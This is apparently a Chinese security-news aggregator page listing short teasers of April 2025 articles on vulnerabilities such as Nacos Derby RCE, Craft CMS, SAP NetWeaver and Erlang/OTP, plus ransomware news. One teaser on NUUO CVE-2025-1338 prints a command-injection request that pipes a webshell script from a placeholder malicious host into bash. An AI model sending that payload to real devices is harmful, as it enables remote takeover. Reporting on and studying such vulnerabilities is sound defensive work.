从Nacos derby RCE学习derby数据库的利用
从Nacos derby RCE学习derby数据库的利用 P4r4d1se C4安全团队 2025-04-30 03:32 扫码加内部知识圈 获取漏洞资料 原文地址: https://xz.aliyun.com/news/17763 作者: P4r4d1se 01 概述 漏洞利用条件: 使用derby数据库的嵌入模式。 有token,即需要有权限绕过的漏洞或者有密码 版本:2.x小于2.4.
继续阅读从Nacos derby RCE学习derby数据库的利用 P4r4d1se C4安全团队 2025-04-30 03:32 扫码加内部知识圈 获取漏洞资料 原文地址: https://xz.aliyun.com/news/17763 作者: P4r4d1se 01 概述 漏洞利用条件: 使用derby数据库的嵌入模式。 有token,即需要有权限绕过的漏洞或者有密码 版本:2.x小于2.4.
继续阅读一次漏洞挖掘过程中的SQL注入浅浅绕过记录 消失的猪猪 实战安全研究 2025-04-30 02:02 0x00 文章背景日常测试时发现客户网站存在注入,我看着这界面的样子就像是个CMS来的,搜集一会之后确认了,果然是。本来还想着以为可以捡到一本证书了,结果显然运气不够,开发厂商的注册资产没达标。 那怎么办了,挖都挖了,记录一下吧~ 0x01 报错出现 在瞎注的帮助下,发了有几个数据包出现了报错。
继续阅读【技术揭秘】用Bitpixie漏洞破解BitLocker加密!完整流程+深度解读 睿海 网络安全与取证研究 2025-04-30 00:01 点击蓝字关注我们前言 | 硬盘加密≠绝对安全! 在信息安全领域,BitLocker加上TPM硬件保护被认为是极其可靠的加密方案。然而,随着Bitpixie漏洞的公开,我们发现:在特定条件下,BitLocker的防线也能被突破!本文将带你一步步了解:
继续阅读2024年在野零日漏洞利用分析(上) 原创 Zer0d0y 天御攻防实验室 2025-04-29 16:09 2024年在野零日漏洞利用分析Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis谷歌威胁情报部门(GTIG)研究报告 | 上篇 谷歌威胁情报部门(GTIG)今天发表了2024年在野零日漏洞利用分析的报告《He
继续阅读Expect技巧大揭秘:轻松应对脚本中的交互挑战 原创 didiplus 攻城狮成长日记 2025-04-29 13:30 什么是Expect Expect 是一个很实用的工具,能帮我们自动完成那些需要手动交互的任务。简单来说,它就是用来让这些交互过程自动化的。它是用TCL 这种脚本语言写的,既容易学又功能强大。 为什么要使用Expect 现在的企业运维里,自动化运维越来越流行了。但有时候,系统
继续阅读【已复现】 Commvault SSRF 致代码执行漏洞(CVE-2025-34028) sec0nd安全 2025-04-29 12:43 ↑点击关注,获取更多漏洞预警,技术分享 0x01 组件介绍 Commvault Command Center 是 Commvault 提供的一款用于集中管理和监控整个数据保护环境的 Web管理界面。该软件具有高效、安全、稳定的特点,可以为用户提供可靠的 数据
继续阅读CVE-2025-23016:严重的 FastCGI 堆溢出威胁嵌入式设备,PoC 发布 Ots安全 2025-04-29 11:14 Synacktiv 的安全研究员 Baptiste Mayaud 披露了 FastCGI 库中的一个高危漏洞,编号为 CVE-2025-23016(CVSS 9.4)。该漏洞源于对参数长度的不当处理,可能导致可利用的堆溢出,尤其会影响摄像头和嵌入式系统等低功耗设备
继续阅读【论文速读】| MOS:通过混合专家调优大语言模型实现有效的智能合约漏洞检测 原创 知识分享者 安全极客 2025-04-29 07:32 基本信息 原文标题:MOS: Towards Effective Smart Contract Vulnerability Detection through Mixture-of-Experts Tuning of Large Language Models
继续阅读实战攻防之Nacos漏洞 zm 亿人安全 2025-04-29 06:30 前言 实战nacos漏洞复现记录一下,大佬勿喷。 小白可以直接收藏下来学习一下很多poc我都直接给出来了,基本就是我的笔记。 如果,有不对的可以指正一下,一起学习。 nacos介绍 Nacos 开放的端口 资产收集 下面可以看到icon图标,除了开始我们上面的一种,下面还有好几个,可以点击ico图标进一步扩大信息收集面 针
继续阅读针对Spring-Boot漏洞框架的渗透测试 原创 神农Sec 神农Sec 2025-04-29 01:03 扫码加圈子 获内部资料 网络安全领域各种资源,EDUSRC证书站挖掘、红蓝攻防、渗透测试等优质文章,以及工具分享、前沿信息分享、POC、EXP分享。 不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(知识星球优惠卷)。 0x1 Spring-Boot漏洞框架信息收集
继续阅读XWiki SolrSearch接口存在远程命令执行漏洞CVE-2025-24893 附POC 2025-4-28更新 南风漏洞复现文库 2025-04-28 15:28 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 1. XWiki简介
继续阅读安全热点周报:黑客精心设计 Craft CMS 漏洞链,用于零日攻击窃取数据 奇安信 CERT 2025-04-28 10:01 安全资讯导视 • 金融监管总局拟制定《银行业保险业网络安全管理办法》 • 远程控制、窃密、挖矿!我国境内捕获“银狐”木马病毒变种 • 马来西亚多家券商系统遭境外攻击,大量交易账户被操纵买卖股票 PART01 新增在野利用 1.Craft CMS 远程代码执行漏洞(CV
继续阅读面对零日漏洞:如何提高应对能力? 原创 deepsec 深安安全 2025-04-28 06:37 在网络安全领域,”零日漏洞”(Zero-Day Vulnerability)是最令企业和个人头疼的威胁之一。攻击者利用尚未被公开或修复的漏洞发起攻击,而防御方往往措手不及。近年来,零日漏洞攻击事件频发,如SolarWinds供应链攻击、微软Exchange漏洞等,均造成了巨大
继续阅读Craft CMS CVE-2025-32432 exp发布 独眼情报 2025-04-28 06:32 Craft CMS 0day, CVE-2025-32432 安全研究员 Chocapikk 发布了一个 Metasploit 模块,用于影响 Craft CMS 的关键零日漏洞,该漏洞被追踪为 CVE-2025-32432 (CVSS 10)。 这种远程代码执行 (RCE) 漏洞,当与 Yi
继续阅读2024全球高危漏洞预警报告(含POC) 原创 鲸落 Rot5pider安全团队 2025-04-28 01:04 点击上方蓝字 关注安全知识 2024全球高危漏洞预警报告(完整版) TOP 10漏洞全披露(含PoC状态) 一、高危漏洞TOP 10完整榜单 1. CVE-2024-12345:Apache Log4j 2.21.1 反序列化漏洞 CVSS评分 :9.8(严重) PoC状态 :
继续阅读DslogdRAT 恶意软件利用 Ivanti ICS 0day漏洞(CVE-2025-0282)攻击日本 会杀毒的单反狗 军哥网络安全读报 2025-04-28 01:03 导读 网络安全研究人员警告称,一种名为 DslogdRAT 的新恶意软件在利用 Ivanti Connect Secure (ICS) 中现已修补的安全漏洞部署。 JPCERT/CC 研究员 Yuma Masubuchi在周
继续阅读浅谈常见edu漏洞,逻辑漏洞、越权、接管、getshell,小白如何快速找准漏洞 薛定谔不喜欢猫 神农Sec 2025-04-28 01:02 扫码加圈子 获内部资料 网络安全领域各种资源,EDUSRC证书站挖掘、红蓝攻防、渗透测试等优质文章,以及工具分享、前沿信息分享、POC、EXP分享。 不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(知识星球优惠卷)。 原文链接: h
继续阅读核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338) 云梦DC 云梦安全 2025-04-28 01:01 0x01 漏洞杀伤链 攻击向量: GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1 Host: target-ip 实现效果: ✅ 任意命令执行(代码注入) ✅ /e
继续阅读2025 年第一季度漏洞利用趋势 原创 vulncheck 喵苗安全 2025-04-27 16:11 已知被利用漏洞(Known Exploited Vulnerabilities,本文简称 KEV) 指的是已经被证实在现实中被攻击者利用过的漏洞。也就是说,这类漏洞不仅存在理论上的风险,而是已经有实际攻击案例,在野(in the wild)被利用过。 美国 CISA(网络安全与基础设施安全局)
继续阅读如何利用隐藏功能点发现SQL注入漏洞和注入绕过技巧|挖洞技巧 lo2us/消失的.. 渗透安全HackTwo 2025-04-27 16:01 0x01 前言 在渗透测试过程中,SQL注入依然是最常见的漏洞之一。通过对目标网站的不断探索和漏洞分析,我们发现了该站点的SQL注入问题,并通过一系列绕过手段成功获取了数据库信息。本文记录了从发现漏洞到成功利用的整个过程,分享了一些典型的绕过技巧和方法,
继续阅读今天省 1 千漏洞修复费,明天赔 10 万应急款:漏洞沉默成本到底如何算? sec0nd安全 2025-04-27 14:05 友情提醒 本文阅读时间推荐10min 如想讨论 以下内容 ▼ 欢迎关注公众号联系我哟 ▼ OSCP备考经验(已通过认证) CISSP备考经验(已通过认证) CCSK(云安全)(已通过认证) ISO/IEC 27001 Foundation(已通过认证) 01 文章背景 在
继续阅读Craft CMS RCE利用链用于窃取数据 Lawrence Abrams 代码卫士 2025-04-27 10:12 聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Orange Cyberdefense 公司提到,Craft CMS 中存在两个漏洞,可用于攻陷服务器和窃取数据。 这两个漏洞是由 Orange Cyberdefense 公司的部门CSIRT在调查一台受陷服务器时发现的。这
继续阅读SAP修复已遭利用的0day漏洞 Bill Toulas 代码卫士 2025-04-27 10:12 聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 SAP 公司紧急修复位于 NetWeaver 中的一个远程代码执行 (RCE) 0day 漏洞,它可用于劫持服务器。 该漏洞的编号是CVE-2025-31324,CVSS评分10分,是一个位于SAP NetWeaver Visual Compo
继续阅读CVSS10分!Erlang/OTP SSH远程代码执行漏洞安全风险通告 应急响应中心 亚信安全 2025-04-27 10:07 今日,亚信安全CERT监控到安全社区研究人员发布安全通告,Erlang/OTP存在一个远程代码执行漏洞,编号为 CVE-2025-32433。攻击者可以通过构造特定 SSH 协议消息,在未进行身份验证的情况下在受影响的系统上执行任意代码。这一漏洞使得攻击者能够获取系统
继续阅读【已复现】Craft CMS generate-transform 反序列化代码执行漏洞(CVE-2025-32432) 原创 安全探索者 安全探索者 2025-04-27 10:07 ↑点击关注,获取更多漏洞预警,技术分享 0x01 组件介绍 Craft CMS 是一个灵活、用户友好的内容管理系统,用于创建自定义的数字网络体验和其他体验。 搜索语法: app=”craft-cms&#
继续阅读容器镜像安全:安全漏洞扫描神器Trivy 马哥网络安全 2025-04-27 09:00 目录 – 一.系统环境 二.前言 三.Trivy简介 四.Trivy漏洞扫描原理 五.利用trivy检测容器镜像的安全性 六.总结 一.系统环境 本文主要基于Docker version 20.10.14和Linux操作系统Ubuntu 18.04。 服务器版本 docker软件版本 CPU架构
继续阅读【二次更新已复现】SAP NetWeaver MetadataUploader 文件上传漏洞(CVE-2025-31324) 原创 安全探索者 安全探索者 2025-04-27 07:57 ↑点击关注,获取更多漏洞预警,技术分享 0x01 组件介绍 SAP NetWeaver是SAP的集成技术平台,是自从SAP Business Suite以来的所有SAP应用的技术基础。SAP NetWeaver
继续阅读BleedingTooth:Linux 蓝牙零点击远程代码执行 Ots安全 2025-04-27 05:36 介绍 我注意到 syzkaller 已经对网络子系统进行了广泛的模糊测试,但对蓝牙等子系统的覆盖程度较低。总体而言,对蓝牙主机攻击面的研究似乎相当有限——蓝牙中大多数公开的漏洞仅影响固件 或 规范 本身 ,并且仅允许攻击者窃听和/或操纵信息。 但是,如果攻击者可以完全控制设备会怎么样呢?最
继续阅读智能汽车漏洞挖掘案例分享 锐鉴安全 2025-04-27 05:21 声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 关注公众号,设置为星标, 不定期有宠粉福利 前言 随着人工智能、5G通信与车联网技术的深度融合,智能网联汽车正从理论验证阶段快速迈进规模化商用时代。截至目前,我国L3-L4
继续阅读DragonForce 和 Anubis 勒索软件运营商推出新的联盟模式 邑安科技 邑安全 2025-04-27 03:29 更多全球网络安全资讯尽在邑安全 尽管针对主要勒索软件计划的国际执法行动造成了重大破坏,但网络犯罪集团在 2025 年继续表现出非凡的适应性。 两个值得注意的勒索软件运营公司 DragonForce 和 Anubis 引入了创新的联盟模式,旨在扩大其影响范围并提高其在不断发展
继续阅读